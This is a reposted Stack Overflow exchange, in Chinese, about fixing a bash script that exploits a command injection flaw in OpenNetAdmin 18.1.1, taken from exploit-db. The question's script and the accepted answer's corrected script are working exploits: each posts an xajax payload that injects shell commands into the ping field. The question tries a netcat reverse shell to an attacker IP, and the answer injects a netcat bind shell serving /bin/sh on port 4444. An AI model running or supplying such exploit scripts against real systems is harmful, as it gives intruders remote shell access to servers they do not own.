gpt4 book ai didi

linux - 漏洞利用的 Bash 语法问题

转载 作者:太空宇宙 更新时间:2023-11-04 05:32:48 25 4
gpt4 key购买 nike

我发现了一个exploit在 OpenNetAdmin 18.1.1 的exploit-db

我必须调整这个脚本,使其对我有用,但我没有完成。这是我到目前为止所拥有的:

URL="xxx.xxx.xxx.xxx/ona"
while true;do
echo -n {"nc -e /bin/sh xxx.xxx.xxx.xxx 4444 "}; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

输出只是:

{nc -e /bin/sh xxx.xxx.xxx.xxx 4444 }

我对语法有点困难。

我做错了什么?

最佳答案

如果您只需要启动 nc 程序,这就是您想要的。该脚本假设远程计算机是 Linux 计算机,使用 -e 支持编译/bin/bash 和 nc (netcat)

#!/bin/bash
URL="http://.../ona"
cmd="nc -l -p 4444 -e /bin/sh"
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1

关于linux - 漏洞利用的 Bash 语法问题,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/59927694/

25 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com